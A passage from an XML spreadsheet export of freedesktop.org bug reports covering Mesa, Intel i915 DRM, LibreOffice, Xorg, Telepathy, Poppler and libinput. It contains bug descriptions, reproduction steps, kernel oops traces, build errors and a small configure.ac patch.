(gem_create:1388) drmtest-DEBUG: Test requirement passed: !(fd&lt;0)
(gem_create:1388) igt_debugfs-DEBUG: Opening debugfs directory '/sys/kernel/debug/dri/0'
(gem_create:1388) igt_debugfs-DEBUG: Opening debugfs directory '/sys/kernel/debug/dri/0'
(gem_create:1388) ioctl_wrappers-CRITICAL: Test assertion failure function gem_read file ../lib/ioctl_wrappers.c:388:
(gem_create:1388) ioctl_wrappers-CRITICAL: Failed assertion: __gem_read(fd handle offset buf length) == 0
(gem_create:1388) ioctl_wrappers-CRITICAL: Last errno: 12 Cannot allocate memory
(gem_create:1388) ioctl_wrappers-CRITICAL: error: -12 != 0
(gem_create:1388) igt_core-INFO: Stack trace:
(gem_create:1388) igt_core-INFO:   #0 ../lib/igt_core.c:1514 __igt_fail_assert()
(gem_create:1388) igt_core-INFO:   #1 ../lib/ioctl_wrappers.c:389 gem_read()
(gem_create:1388) igt_core-INFO:   #2 [+0x7663fc00]
****  END  ****
Subtest create-clear: FAIL (4.183s)</t>
  </si>
  <si>
    <t>TELEPATHY-20578</t>
  </si>
  <si>
    <t>Can't cancel outgoing calls by removing self-handle until streaming implementation has called Ready</t>
  </si>
  <si>
    <t>Gabble does not allow outgoing calls to be cancelled by removal of the self-handle from the GabbleMediaChannel's members until we've sent the Jingle session-initiate. This is not done until the stream handler has called Ready potentially meaning that clients have difficulty recovering from a broken streaming implementation.
(Clients can still call Close in this circumstance though.)</t>
  </si>
  <si>
    <t>DBUS-75833</t>
  </si>
  <si>
    <t>[PATCH] Update .gitignore files</t>
  </si>
  <si>
    <t>Created attachment 95223
Patch</t>
  </si>
  <si>
    <t>l.skalski</t>
  </si>
  <si>
    <t>MESA-108024</t>
  </si>
  <si>
    <t>[Debian Stretch]Fail to build because xcb_randr_lease_t</t>
  </si>
  <si>
    <t>Created attachment 141692
Build log error radeon vulkan
Hello
I try to build Mesa 18.2.1 on Debian Stretch with version 1.12 of libxcb packages. Unfortunatly the build fails during the compilation of Radeon Vulkan driver about  xcb_randr_lease_t / xcb_randr_create_lease_cookie_t etc ... type name which are unknown.
I attach the complete build log. The errors are at the end of file.
Thanks
Maxime</t>
  </si>
  <si>
    <t>berillions</t>
  </si>
  <si>
    <t>MESA-78097</t>
  </si>
  <si>
    <t>glUniform1ui and friends not supported by display lists</t>
  </si>
  <si>
    <t>Discovered by inspection while implementing display list support for ARB_separate_shader_objects.  Note the following code in dlist.c:
	 case OPCODE_UNIFORM_1UI:
	    /*CALL_Uniform1uiARB(ctx-&gt;Exec (n[1].i n[2].i))*/
	    break
	 case OPCODE_UNIFORM_2UI:
	    /*CALL_Uniform2uiARB(ctx-&gt;Exec (n[1].i n[2].i n[3].i))*/
	    break
	 case OPCODE_UNIFORM_3UI:
	    /*CALL_Uniform3uiARB(ctx-&gt;Exec (n[1].i n[2].i n[3].i n[4].i))*/
	    break
	 case OPCODE_UNIFORM_4UI:
	    /*CALL_Uniform4uiARB(ctx-&gt;Exec
                              (n[1].i n[2].i n[3].i n[4].i n[5].i))
            */
	    break
Someone should adapt tests/spec/arb_separate_shader_objects/dlist.c to be a (new) tests/spec/gl-3.0/dlist.c to test these functions.</t>
  </si>
  <si>
    <t>POPPLER-22063</t>
  </si>
  <si>
    <t>when printing words slant up the page</t>
  </si>
  <si>
    <t>Created attachment 26394
The PDF page generated by evince
I downloaded a 2.8 MB PDF from http://www.firesifestes.com/Fires/F-Cirera-Sta-Col-Cervello.htm (no longer available from the site but I can sent it by email).  I opened the PDF in evince and saved one of the pages as a PDF.  I then used pdftops to convert the PDF page to a postscript page.  On the postscript page the text slants upward at about 45 degrees.  It seems like the WMode of the generated postscript font is wrong and the position after each character shifts both right and up.
To reproduce:
Open the 2.8 MB file in evince and print page 18 to a PDF file.
$ evince Festa-cirera.pdf
Check that the page is OK.
$ evince output.pdf
Convert the page to postscript using pdftops from either xpdf or poppler.
$ pdftops output.pdf output-pdftopsbug.ps
View the postscript page.
$ gv output-pdftopsbug.ps
I will attach the single page PDF and ps and screen captures.
$ ls -ltr Festa-cirera.pdf output.pdf output.gif output-pdftopsbug.ps output-pdftopsbug.gif
-r--r--r-- 1 william users 2860442 2009-05-30 17:28 Festa-cirera.pdf
-rw-rw-rw- 1 william users  214486 2009-06-03 15:00 output.pdf
-rw-rw-rw- 1 william users   98819 2009-06-03 15:04 output.gif
-rw-rw-rw- 1 william users  604911 2009-06-03 15:05 output-pdftopsbug.ps
-rw-rw-rw- 1 william users   36067 2009-06-03 15:06 output-pdftopsbug.gif
I have Fedora 8 xpdf-3.02pl3 poppler-0.10.7 gs8.64 evince 2.20.2 (using poppler 0.6.2 (cairo)).
William
williambader@hotmail.com</t>
  </si>
  <si>
    <t>MESA-49768</t>
  </si>
  <si>
    <t>[BUG][FIX] incorrect command format in the help string of r600-llvm-compiler in configure.ac</t>
  </si>
  <si>
    <t>How to reproduce the bug:
  ./configure --help 
  You will see:
  --enable-r600-llvm-compiler
                          Enable experimental LLVM backend for graphics
                          shaders @&lt;:default=disable]
What is the correct result:
./configure --help 
  You will see:
  --enable-r600-llvm-compiler
                          Enable experimental LLVM backend for graphics
                          shaders [default=disable]
This bug can be fixed by the patch below:
diff --git a/configure.ac b/configure.ac
index 43a7c0c..d66d893 100644
--- a/configure.ac
+++ b/configure.ac
@@ -6397 +6397 @@ AC_ARG_ENABLE([gallium_gbm]
 AC_ARG_ENABLE([r600-llvm-compiler]
     [AS_HELP_STRING([--enable-r600-llvm-compiler]
-        [Enable experimental LLVM backend for graphics shaders @@
+        [Enable experimental LLVM backend for graphics shaders @
     [enable_r600_llvm=$enableval]
     [enable_r600_llvm=no])</t>
  </si>
  <si>
    <t>LIBREOFFICE-67737</t>
  </si>
  <si>
    <t>FILEOPEN: DOCX shape with mirroring not mirrored in LO</t>
  </si>
  <si>
    <t>Created attachment 83606
DOCX containing vertically flipped arrow
Problem description: 
When opening a shape that is 'flipped' on an X or Y axis - it does not appear flipped in LO.
Steps to reproduce:
1. Open the attached DOCX
2. LO doesn't show it as flipped
Current behavior:
LO doesn't show the shape as flipped vertically
Expected behavior:
LO should show the shape as flipped vertically
Operating System: All
Version: 4.2.0.0.alpha0+ Master</t>
  </si>
  <si>
    <t>MESA-110761</t>
  </si>
  <si>
    <t>Drivers/X11</t>
  </si>
  <si>
    <t>Huge problems between Mesa and Electron engine apps</t>
  </si>
  <si>
    <t>Created attachment 144347
Example in Spotify app
After updating to 19.0.5 all programs that works on electron engine have huge visual artefacts on amd cards (flashing elements blinking and appears in the new place every second). Non-electron apps works normal. Downgrading to 19.0.4 fixes all problems. This bug also persist on wayland session. 100% affected apps: Skype (little bit) Spotify (huge artefacts impossible to see something) Discord (little bit). What i was tried: change videocard to another disable compositor disable vsync change DE. Nothing helped. Don't know if this bug exist on nvidia cards.</t>
  </si>
  <si>
    <t>pavlyuch</t>
  </si>
  <si>
    <t>XORG-26971</t>
  </si>
  <si>
    <t>xserver --enable-debug compile error in hw/xfree86/common/xf86Config.c</t>
  </si>
  <si>
    <t xml:space="preserve">The following build error with --enable-debug was introduced by commit e1165632bdfbd720889ed1adf5f7ab338032c0ee (xfree86: Add Option AutoServerLayout for input devices.):
...
 gcc -DHAVE_CONFIG_H -I. -I. -I../../../include -I../../../include -I../../../include -I../../../include -I../../../include -I../../../include -I../../../include -I../../../include -I../../../hw/xfree86 -I../../../hw/xfree86/include -I../../../hw/xfree86/common -I../../../hw/xfree86/os-support -I../../../hw/xfree86/os-support/bus -I../../../os -I./../ddc -I./../i2c -I./../loader -I./../parser -I./../vbe -I./../int10 -I./../vgahw -I./../dixmods/extmod -I./../modes -I./../ramdac -DHAVE_DIX_CONFIG_H -Wall -Wpointer-arith -Wstrict-prototypes -Wmissing-prototypes -Wmissing-declarations -Wnested-externs -fno-strict-aliasing -Wbad-function-cast -Wformat=2 -Wold-style-definition -Wdeclaration-after-statement -D_BSD_SOURCE -DHAS_FCHOWN -DHAS_STICKY_DIR_BIT -I/usr/include/freetype2 -I/usr/include/pixman-1 -I../../../include -I../../../include -I../../../Xext -I../../../composite -I../../../damageext -I../../../xfixes -I../../../Xi -I../../../mi -I../../../miext/shadow -I../../../miext/damage -I../../../render -I../../../randr -I../../../fb -fvisibility=hidden -DHAVE_XORG_CONFIG_H -fvisibility=hidden -DXF86PM -g -O2 -MT xf86Config.lo -MD -MP -MF .deps/xf86Config.Tpo -c xf86Config.c  -fPIC -DPIC -o .libs/xf86Config.o
xf86Config.c: In function 'configInputDevices':
xf86Config.c:1514: error: request for member 'lay_identifier' in something not a structure or union
make[5]: *** [xf86Config.lo] Error 1
</t>
  </si>
  <si>
    <t>DRI-109054</t>
  </si>
  <si>
    <t>[CI][BAT] BSW machines oops on boot</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_5311/fi-bsw-n3050/pstore0-1544696978_Oops_1.log
[   13.978684] BUG: unable to handle kernel NULL pointer dereference at 0000000000000048
[   13.978718] PGD 0 P4D 0 
[   13.978733] Oops: 0000 [#1] PREEMPT SMP PTI
[   13.978750] CPU: 0 PID: 282 Comm: modprobe Not tainted 4.20.0-rc5-CI-CI_DRM_5294+ #1
[   13.978773] Hardware name:  /NUC5CPYB BIOS PYBSWCEL.86A.0058.2016.1102.1842 11/02/2016
[   13.978932] RIP: 0010:cherryview_load_csc_matrix+0x1e6/0x210 [i915]
[   13.978953] Code: 41 5c 41 5d e9 7b 83 aa e1 41 c1 e4 0d 48 83 bd 00 02 00 00 00 48 8b 85 10 02 00 00 45 89 e5 74 09 ba 01 00 00 00 31 c9 eb 9d  8b 50 48 48 c1 ea 03 81 fa 00 01 00 00 75 07 31 d2 48 85 c0 75
[   13.979001] RSP: 0018:ffffc9000026f840 EFLAGS: 00010246
[   13.979018] RAX: 0000000000000000 RBX: ffff888165500000 RCX: 7885fe6200000000
[   13.979039] RDX: 0000000000000020 RSI: ffff88816553a008 RDI: ffff888165464a88
[   13.979060] RBP: ffff888165464a88 R08: 000000000ed0e429 R09: 0000000000000001
[   13.979080] R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000004000
[   13.979101] R13: 0000000000004000 R14: ffff888165500000 R15: ffff888165464a88
[   13.979122] FS:  00007fb69c4f3540(0000) GS:ffff88817ba00000(0000) knlGS:0000000000000000
[   13.979146] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[   13.979163] CR2: 0000000000000048 CR3: 000000016d7fa000 CR4: 00000000001006f0
[   13.979184] Call Trace:
[   13.979302]  intel_update_crtc+0x18f/0x2b0 [i915]
[   13.979421]  intel_update_crtcs+0x49/0x60 [i915]
[   13.979538]  intel_atomic_commit_tail+0x1ea/0xd70 [i915]
[   13.979657]  ? intel_atomic_commit_ready+0x3f/0x50 [i915]
[   13.979762]  ? __i915_sw_fence_complete+0x1a0/0x250 [i915]
[   13.979884]  intel_atomic_commit+0x244/0x330 [i915]
[   13.980002]  intel_initial_commit+0xb6/0x140 [i915]
[   13.980127]  intel_modeset_init+0x7a1/0x1880 [i915]
[   13.980235]  i915_driver_load+0xcbb/0x15c0 [i915]
[   13.980257]  ? __pm_runtime_resume+0x4f/0x80
[   13.980277]  ? _raw_spin_unlock_irqrestore+0x4c/0x60
[   13.980296]  ? lockdep_hardirqs_on+0xe0/0x1b0
[   13.980401]  i915_pci_probe+0x29/0xa0 [i915]
[   13.980421]  pci_device_probe+0xa1/0x130
[   13.980440]  really_probe+0xf3/0x3e0
[   13.980456]  driver_probe_device+0x10a/0x120
[   13.980474]  __driver_attach+0xdb/0x100
[   13.980489]  ? driver_probe_device+0x120/0x120
[   13.980505]  ? driver_probe_device+0x120/0x120
[   13.980522]  bus_for_each_dev+0x74/0xc0
[   13.980539]  bus_add_driver+0x15f/0x250
[   13.980554]  ? 0xffffffffa0348000
[   13.980568]  driver_register+0x56/0xe0
[   13.980583]  ? 0xffffffffa0348000
[   13.980597]  do_one_initcall+0x58/0x2e0
[   13.980615]  ? do_init_module+0x1d/0x1ea
[   13.980631]  ? rcu_read_lock_sched_held+0x6f/0x80
[   13.980649]  ? kmem_cache_alloc_trace+0x264/0x290
[   13.980668]  do_init_module+0x56/0x1ea
[   13.980685]  load_module+0x227a/0x29c0
[   13.980715]  ? __se_sys_finit_module+0xd3/0xf0
[   13.980731]  __se_sys_finit_module+0xd3/0xf0
[   13.980756]  do_syscall_64+0x55/0x190
[   13.980772]  entry_SYSCALL_64_after_hwframe+0x49/0xbe
[   13.980789] RIP: 0033:0x7fb69c019839
[   13.980804] Code: 00 f3 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05  3d 01 f0 ff ff 73 01 c3 48 8b 0d 1f f6 2c 00 f7 d8 64 89 01 48
[   13.980851] RSP: 002b:00007ffdc112e3a8 EFLAGS: 00000246 ORIG_RAX: 0000000000000139
[   13.980875] RAX: ffffffffffffffda RBX: 000055c689fe0b30 RCX: 00007fb69c019839
[   13.980895] RDX: 0000000000000000 RSI: 000055c689a05d2e RDI: 0000000000000000
[   13.980916] RBP: 000055c689a05d2e R08: 0000000000000000 R09: 0000000000000000
[   13.980936] R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000
[   13.980957] R13: 000055c689fe0c60 R14: 0000000000040000 R15: 000055c689fe0b30
[   13.980986] Modules linked in: i915(+) snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm pinctrl_cherryview prime_numbers
[   13.981027] CR2: 0000000000000048
[   13.982459] ---[ end trace ab7623fadd37d04c ]---
This shows that we are doing a bad job at detecting regressions when they happen during the boot...
Thanks to Eero Tamminen for detecting and notifying us about this issue!</t>
  </si>
  <si>
    <t>DRI-27115</t>
  </si>
  <si>
    <t>[clarkdale] GPU hangs and resets indefinitely</t>
  </si>
  <si>
    <t>Created attachment 34126
dmesg with drm.debug=0x02
Originally reported by KeithM at:
  https://bugs.launchpad.net/bugs/516909
Occationally the GPU hangs gets reset then hangs again etc. With drm.debug=0x02 on recent drm-intel-next kernel dmesg fills up with 
[34143.216468] [drm:i915_add_request] 524154
[34143.216659] [drm:i915_add_request] 524155
[34143.713488] [drm:intel_gpu_idle_timer] idle timer fired downclocking
[34143.963261] [drm:i915_hangcheck_elapsed] *ERROR* Hangcheck timer elapsed... GPU hung
[34143.963268] render error detected EIR: 0x00000000
[34143.963284] [drm:i915_do_wait_request] *ERROR* i915_do_wait_request returns -5 (awaiting 524155 at 512362)
[34143.963298] [drm:i915_error_work_func] generating error event
[34143.963323] [drm:i915_error_work_func] resetting chip
[34143.963533] [drm:gm45_get_vblank_counter] trying to get vblank count for disabled pipe 1
keith@newb:~$ lspci -nn | grep VGA
00:02.0 VGA compatible controller [0300]: Intel Corporation Clarkdale Integrated Graphics Controller [8086:0042] (rev 12)</t>
  </si>
  <si>
    <t>XORG-4911</t>
  </si>
  <si>
    <t>Libtool related packaging problem</t>
  </si>
  <si>
    <t>In the X11R7-RC1 packaged libraries I get the following error messages:
    ./libtool: line 4181: test: : integer expression expected
Lines 4216 5439 and 5461 also occur.
I can work around the problem by setting the environment variable max_cmd_len
to -1 when building.  The problem also occurs with
lib{XaufontencXfontXdmcpxkbfile} but is most severe with libX11 since
then it fills up my disk adding object files to the library one by one
and keeping each intermediate copy.
See also bug #94 (yes that long ago).</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-9218</t>
  </si>
  <si>
    <t>mailman 2.1.5 has broken filtering please upgrade to allow whitelisting</t>
  </si>
  <si>
    <t>According to Steve Langasek mailman 2.1.5 has broken filtering and does not
correctly process the filters which could allow whitelisting certain types of
mail (such as Debian bug reports).  We'd really like this for the xcb mailing
list.  Could you please consider upgrading mailman or applying whatever upstream
patch fixes this problem?
Thanks.</t>
  </si>
  <si>
    <t>TELEPATHY-44096</t>
  </si>
  <si>
    <t>Rename CallState RINGING to INITIALISED</t>
  </si>
  <si>
    <t>as said in title</t>
  </si>
  <si>
    <t>DRI-103251</t>
  </si>
  <si>
    <t>[CI] igt@gem_userptr_blits@sync-unmap-cycles - dmesg-warn - WARNING: possible circular locking dependency detected</t>
  </si>
  <si>
    <t>a new lockdep? on CI_DRM_3225 HSW-shards:
Note a fix for BUG 102886 was integrated to CI_DRM_3215 a fix for BUG 102939 was integrated to CI_DRM_3202. 
So this looks like a new thing therefore I file a new bug. Feel free to re-open and duplicate to the old ones. 
I have checked dmesgs from surrounding runs where we don't hit the issues but there is no other splat before so this looks more sporadic than the previous ones.
https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_3225/shard-hsw6/igt@gem_userptr_blits@sync-unmap-cycles.html
this is also after CI_DRM_3215 but I believe I had not archived BUG 102939 before it hit. So it was missed by cibuglog.
https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_3216/shard-snb1/igt@gem_userptr_blits@map-fixed-invalidate-gup.html
[   20.805315] ======================================================
[   20.805316] WARNING: possible circular locking dependency detected
[   20.805319] 4.14.0-rc4-CI-CI_DRM_3225+ #1 Tainted: G     U         
[   20.805320] ------------------------------------------------------
[   20.805322] kworker/6:1H/1438 is trying to acquire lock:
[   20.805324]  (&amp;mm-&gt;mmap_sem){++++} at: [] __i915_gem_userptr_get_pages_worker+0x141/0x240 [i915]
[   20.805355] 
               but now in release context of a crosslock acquired at the following:
[   20.805357]  ((complete)&amp;this_flusher.done){+.+.} at: [] wait_for_completion+0x1d/0x20
[   20.805363] 
               which lock already depends on the new lock.
[   20.805365] 
               the existing dependency chain (in reverse order) is:
[   20.805367] 
               -&gt; #1 ((complete)&amp;this_flusher.done){+.+.}:
[   20.805372]        __lock_acquire+0x1420/0x15e0
[   20.805374]        lock_acquire+0xb0/0x200
[   20.805376]        wait_for_common+0x58/0x210
[   20.805378]        wait_for_completion+0x1d/0x20
[   20.805381]        flush_workqueue+0x1af/0x540
[   20.805400]        i915_gem_userptr_mn_invalidate_range_start+0x13c/0x150 [i915]
[   20.805404]        __mmu_notifier_invalidate_range_start+0x76/0xc0
[   20.805406]        unmap_vmas+0x7d/0xa0
[   20.805408]        unmap_region+0xae/0x110
[   20.805410]        do_munmap+0x276/0x3f0
[   20.805411]        vm_munmap+0x67/0x90
[   20.805413]        SyS_munmap+0xe/0x20
[   20.805415]        entry_SYSCALL_64_fastpath+0x1c/0xb1
[   20.805416] 
               -&gt; #0 (&amp;mm-&gt;mmap_sem){++++}:
[   20.805419]        down_read+0x3e/0x70
[   20.805435]        __i915_gem_userptr_get_pages_worker+0x141/0x240 [i915]
[   20.805438]        process_one_work+0x233/0x660
[   20.805440]        worker_thread+0x4e/0x3b0
[   20.805441]        kthread+0x152/0x190
[   20.805442] 
               other info that might help us debug this:
[   20.805445]  Possible unsafe locking scenario by crosslock:
[   20.805447]        CPU0                    CPU1
[   20.805448]        ----                    ----
[   20.805449]   lock(
[   20.805451]   lock((complete)
[   20.805453]                                lock(
[   20.805455]                                unlock((complete)
[   20.805457] 
                *** DEADLOCK ***
[   20.805460] 2 locks held by kworker/6:1H/1438:
[   20.805461]  #0:  (&amp;(&amp;pool-&gt;lock)-&gt;rlock){-.-.} at: [] process_one_work+0x2dc/0x660
[   20.805465]  #1:  (&amp;x-&gt;wait#10){....} at: [] complete+0x1d/0x60
[   20.805469] 
               stack backtrace:
[   20.805472] CPU: 6 PID: 1438 Comm: kworker/6:1H Tainted: G     U          4.14.0-rc4-CI-CI_DRM_3225+ #1
[   20.805474] Hardware name: MSI MS-7924/Z97M-G43(MS-7924) BIOS V1.12 02/15/2016
[   20.805480] Call Trace:
[   20.805483]  dump_stack+0x68/0x9f
[   20.805486]  print_circular_bug+0x235/0x3c0
[   20.805488]  ? HARDIRQ_verbose+0x10/0x10
[   20.805490]  check_prev_add+0x430/0x840
[   20.805492]  ? ret_from_fork+0x27/0x40
[   20.805494]  lock_commit_crosslock+0x3ee/0x660
[   20.805496]  ? lock_commit_crosslock+0x3ee/0x660
[   20.805498]  complete+0x29/0x60
[   20.805500]  pwq_dec_nr_in_flight+0x9c/0xa0
[   20.805502]  ? _raw_spin_lock_irq+0x40/0x50
[   20.805504]  process_one_work+0x335/0x660
[   20.805506]  worker_thread+0x4e/0x3b0
[   20.805508]  kthread+0x152/0x190
[   20.805509]  ? process_one_work+0x660/0x660
[   20.805511]  ? kthread_create_on_node+0x40/0x40
[   20.805513]  ret_from_fork+0x27/0x40
[   22.417432] random: crng init done</t>
  </si>
  <si>
    <t>LIBREOFFICE-42122</t>
  </si>
  <si>
    <t>Deleting entries from user-defined dictionaries does not work properly</t>
  </si>
  <si>
    <t>Created attachment 52646
user-defined dictionary to reproduce the bug
The deletion of words from a user-defined dictionary does not work properly using the UI given at Tools &gt; Options &gt; Language Settings &gt; Writinge Aids.
STEPS TO REPRODUCE
1) Go to Writing Aids
2) Create a new Dictionary (e.g. with the name test all languages)
3) Edit test
4) Add the words zappy and xappy
5) Hit Close hit OK. test.dic now looks this way:
OOoUserDict1
lang: 
type: positive
---
xappy
zappy
6) Reopen Writing Aids
7) Remove xappy
8) Hit Close hit OK. test.dic now looks this way:
OOoUserDict1
lang: 
type: positive
---
zappy
zappy
ANOTHER EXAMPLE
This bug also applies to already existing user dictionaries. Deleting a randaom word from the attached dictionary ends at some confusion around the last few lines. Before:
   ...
   Ã–zdogan
   Ã–zdogans
   Ã¤sopische
After deleting the entry Agamben (hit Close and OK) the file ending looks like this:
   ...
   Ã–zdogan
   Ã–zdogans
   Ã¤sopische
   opische
After deleting another entry (for this example Ahasveros hit Close and OK) seems to corrupt the file totally. After that for some reasons my plain text editor does not recognize anymore that the file is UTF8-encoded (also another line has been added):
   ...
   ÃƒÂ–zdogan
   ÃƒÂ–zdogans
   Ãƒâ‚¬sopische
   â‚¬sopische
   opische</t>
  </si>
  <si>
    <t>nicodorn</t>
  </si>
  <si>
    <t>MESA-25982</t>
  </si>
  <si>
    <t>Update 7.4 -&gt; 7.6.1 disables DRI</t>
  </si>
  <si>
    <t>Created attachment 32563
dmesg
Updating only Mesa from 7.4.4 to 7.6.1 disables DRI for me.
Radeon X1300 Pro pci-e
Initial specs: linux 2.6.30.10 Xorg 7.4 ati 6.12.4
Just to be sure I also updated the kernel to 2.6.32.3 and Xorg to 7.5 but still no direct rendering.
Current specs: linux 2.6.32.3 Xorg 7.5 ati 6.12.99 (today's git master).
Also tried Mesa 7.7 bug is still present.
dmesg | grep drm:
[drm] Initialized drm 1.1.0 20060810
[drm] radeon defaulting to userspace modesetting.
[drm] Initialized radeon 1.31.0 20080528 for 0000:01:00.0 on minor 0
grep drm Xorg.0.log
(II) [KMS] drm report modesetting isn't supported.
drmOpenDevice: node name is /dev/dri/card0
drmOpenByBusid: Searching for BusID pci:0000:01:00.0
drmOpenDevice: node name is /dev/dri/card0
drmOpenByBusid: drmOpenMinor returns -1
drmOpenDevice: node name is /dev/dri/card1
drmOpenByBusid: drmOpenMinor returns -1
... etc until card15</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-9002</t>
  </si>
  <si>
    <t>Biblical variant of 'il' keyboard layout</t>
  </si>
  <si>
    <t>Studying theology and using Linux is proving to be a road filled with
challenges.  I have created a (complete) variant for the il-layout which
includes all characters needed to type Old-Testament Hebrew.  The
variant was designed by Tiro (the same people who designed the SBL
Hebrew font) and I took that specification and entered it into a symbols
file.
Attached are the modified symbols-file (symbols/il) along with the modified
symbols.lst  rules/base.lst rules/base.xml in the tarball.  Also a .diff is
attached which contains the patch of the four files as needed on the X.org X
Window System Version 6.9.0.
My wish is that this layout will become integrated into the main tree of the
X-Server.  The primary differences to the standard hebrew layout (basic or
si1452) are documented briefly in the symbols file (symbols/il).</t>
  </si>
  <si>
    <t>waschtl</t>
  </si>
  <si>
    <t>LIBREOFFICE-48870</t>
  </si>
  <si>
    <t>kill the cookies</t>
  </si>
  <si>
    <t>Description in:
http://lists.freedesktop.org/archives/libreoffice/2012-April/030320.html
We need to kill the code that uses icon-themes/galaxy/res/cookie.png
And mark this UCB / UNO interface as deprecated - a quick:
git grep andleCookiesRequest
shows most of the places to touch the iahnd code needs git rm'ing as does the uui/source/cookiedlg* - which will need removing from the top-level uui/*.mk files too.
Should be an easy hack to remove some long overdue cruft from the days when LibreOffice was a web browser -)</t>
  </si>
  <si>
    <t>netrolller.3d</t>
  </si>
  <si>
    <t>LIBREOFFICE-55385</t>
  </si>
  <si>
    <t>EDITING: Report-Builder doesn't allow to group a report by the month of a date - wrong SQL-Code</t>
  </si>
  <si>
    <t>I use LO 3.6.1 with Report Builder 1.2.3. When I run the report I receive error Column not found: MONTH_ .... In this report I group data by month with LO option Sorting and grouping.... 
In LO 3.5.6 the report run without any problems but the problem appeared in LO 3.6.x. and next.
Other information:
State SQL: S1000
Error: Column not found: MONTH_Data sprzedaÅ¼y in statement...
Exception type: com.sun.star.lang.WrappedTargetException</t>
  </si>
  <si>
    <t>tomkowski</t>
  </si>
  <si>
    <t>LIBREOFFICE-70371</t>
  </si>
  <si>
    <t>Identify unused headers</t>
  </si>
  <si>
    <t>Now that we have gbuild and gbuild only it should be rather easy to identify unused C/C++ headers. For this this EasyHack asks to create a script that:
- concats and sorts all the filenames mentioned in workdir/unxlngx6.pro/Dep/CxxObject and workdir/unxlngx6.pro/Dep/CObject
- runs a `git ls-tree HEAD -r --name-only`
- and reports files in the second that are not in the first.
This might still create some false positives because of e.g. platform dependant files but it should be a good starting point: Obviously such headers if truly unused should be removed from the repository tree.</t>
  </si>
  <si>
    <t>LIBREOFFICE-76013</t>
  </si>
  <si>
    <t>File Corruption : If original file has image whose link is broken then the RT gets corrupted.</t>
  </si>
  <si>
    <t>Created attachment 95575
File has image whose link is broken.
Issue Simulation:
1) Open the File in LO.
2) Save it as docx.
3) Open the file in MSO.
Expected Behavior:
The roundtripped file results in corruption
Expected behavior:
File should open without any corruption.
Observation:
It is observed that the original file has images whose link is broken which is causing the corruption in RT file.</t>
  </si>
  <si>
    <t>XORG-32</t>
  </si>
  <si>
    <t>xft.h/XftFreetype.h isn't installed in some case</t>
  </si>
  <si>
    <t>xft.h and XftFreetype.h aren't installed in /usr/X11R6/include/X11/Xft/ if there
is one already and more recent file (There was default Xfree Xft.h file)
i use --prefix=/usr/X11R6
Xfree Xft.h and XftFreetype.h includes was older version.
I use make 3.79.1
A version test could be a good thing (as done in pango 1.2.1)
#include 
#if defined(XftVersion) &amp;&amp; XftVersion &gt;= 20000
#else
#error must have Xft version 2 or newer
#endif
and change it to if oldere version -&gt; install.</t>
  </si>
  <si>
    <t>fontconfig</t>
  </si>
  <si>
    <t>WAYLAND-99976</t>
  </si>
  <si>
    <t>Clickpad button presses registered wrongly</t>
  </si>
  <si>
    <t>Testing a 1.7.x pre-release build (from https://koji.fedoraproject.org/koji/taskinfo?taskID=18007385) of libinput I am experiencing presses of clickpad buttons being reported wrongly.
It doesn't make much sense but everything seems to work normally within one window (this is running Gnome with Wayland on F25) but as soon as I move to a different window clicks on the middle or right button are reported as left button clicks - that much I have confirmed using libinput-debug-events to monitor events.
The incorrect reporting seems to persist for as long as my finger remains in contact with the touchpad no matter how many times I click but lifting it right off the pad briefly normally fixes things and causes the next click to be reported correctly though sometimes it takes a couple of attempts especially for the right button.</t>
  </si>
  <si>
    <t>DRI-19170</t>
  </si>
  <si>
    <t>compiz w/ 3D effects causes Intel GM45 hang in drm module</t>
  </si>
  <si>
    <t>Created attachment 21289
X server log file
Overview:
If I enable 3D in the server and run compiz (this is Fedora 10 but running the latest git X / dri / drm / mesa) with 3D effects enabled I get rather frequent (but not deterministically reproducible) hangs of the X server. They usually happen when switching applications or desktops.
Steps to reproduce:
Run X server with compiz / 3D effects enabled and keep switching between desktops and applications. It sometimes takes quite a while to trigger sometimes it happens within maybe 20 minutes of working on the system.
Actual Result:
X server crashes but the system stays responsive. I can log in remotely kill the X server and gdm will gladly start a new instance for me (but I tend to lose text consoles in that process)
Expected result:
X server doesn't crash?
Build date and Platform
X.Org X Server 1.6.99.1
Release Date: (unreleased)
X Protocol Version 11 Revision 0
Build Operating System: Linux 2.6.28-rc8 x86_64 
Current Operating System: Linux xxxx 2.6.28-rc8 #13 SMP Thu Dec 11 14:13:23 PST 2008 x86_64
Build Date: 12 December 2008  08:28:40AM
Additional information:
Stack trace always looks something like this:
#0  0x0000003c9b4ddff7 in ioctl () from /lib64/libc.so.6
#1  0x00007f3a15b46753 in drmIoctl (fd=13 request=3222823994 arg=0x7fff1f0bcf70) at xf86drm.c:183
#2  0x00007f3a15b46bf0 in drmWaitVBlank (fd=13 vbl=0x7fff1f0bcf70) at xf86drm.c:1895
#3  0x00007f3a04364b3e in do_wait (vbl=0x7fff1f0bcf70 vbl_seq=0x4095640 fd=520867696) at ../common/vblank.c:255
#4  0x00007f3a04364d53 in driWaitForVBlank (priv=0x40955e0 missed_deadline=0x7fff1f0bcfff )
    at ../common/vblank.c:406
#5  0x00007f3a0436ca05 in intelSwapBuffers (dPriv=0x40955e0) at intel_buffers.c:740
#6  0x00007f3a04364f43 in driSwapBuffers (dPriv=0xd) at ../common/dri_util.c:321
#7  0x00007f3a15f9488f in __glXDRIdrawableSwapBuffers (basePrivate=0x4095500) at glxdri.c:251
#8  0x00007f3a15f88b16 in __glXDisp_SwapBuffers (cl= pc=) at glxcmds.c:1435
#9  0x00007f3a15f8be2f in __glXDispatch (client=0x25a4500) at glxext.c:522
#10 0x0000000000451aa4 in Dispatch () at dispatch.c:437
#11 0x000000000042398d in main (argc=8 argv=0x7fff1f0bd288 envp=) at main.c:382
This is on a Thinkpad X200s:
(II) intel(0): Integrated Graphics Chipset: Intel(R) Mobile IntelÂ® GM45 Express Chipset
(--) intel(0): Chipset: Mobile IntelÂ® GM45 Express Chipset
